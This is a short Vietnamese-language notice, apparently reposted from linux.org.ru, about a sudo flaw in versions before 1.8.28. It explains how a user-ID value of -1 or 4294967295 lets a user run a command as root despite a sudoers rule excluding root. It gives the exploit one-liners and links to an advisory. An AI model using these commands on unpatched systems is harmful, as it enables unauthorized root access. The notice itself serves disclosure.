Một lỗi trong sudo cho phép bạn thực thi bất kỳ tệp thực thi nào dưới dạng root nếu /etc/sudoers cho phép người dùng khác thực thi nó và bị cấm đối với root.
Việc khai thác lỗi rất đơn giản:
sudo -u#-1 id -u
hoặc:
sudo -u#4294967295 id -u
Lỗi xuất hiện trong tất cả các phiên bản sudo trước 1.8.28
Chi tiết:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Nguồn: linux.org.ru